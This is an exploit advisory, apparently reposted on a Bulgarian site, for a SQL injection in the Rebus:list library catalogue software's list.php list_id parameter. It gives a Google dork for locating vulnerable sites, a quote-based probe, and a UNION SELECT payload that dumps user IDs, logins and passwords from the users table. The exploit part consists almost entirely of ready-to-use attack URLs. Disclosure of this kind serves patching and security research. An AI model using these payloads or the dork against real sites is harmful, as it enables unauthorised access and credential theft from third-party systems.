# Exploit Title: Rebus:list SQL Injection Vulnerability

# Date: 3/18/2013

# Vendor Homepage: http://www.ptfs-europe.com/products/rebus/rebuslist/
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: list_id=

# Google Dork: intext: Powered by rebus:list
 
##############################################################
Exploit:
 
http://server/list.php?list_id=2'

http://server/list.php?list_id=-2 union all select 1,2,group_concat(user_id,0x3a,login,0x3a,password) FROM users--
 

##############################################################
 
http://www.areyousecure.net
 
# Shouts to the Belegit crew
Rate this post
Брой прочитания на тази страница: 1016
Rebus:list (list.php, list_id param) – SQL Injection Vulnerability
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *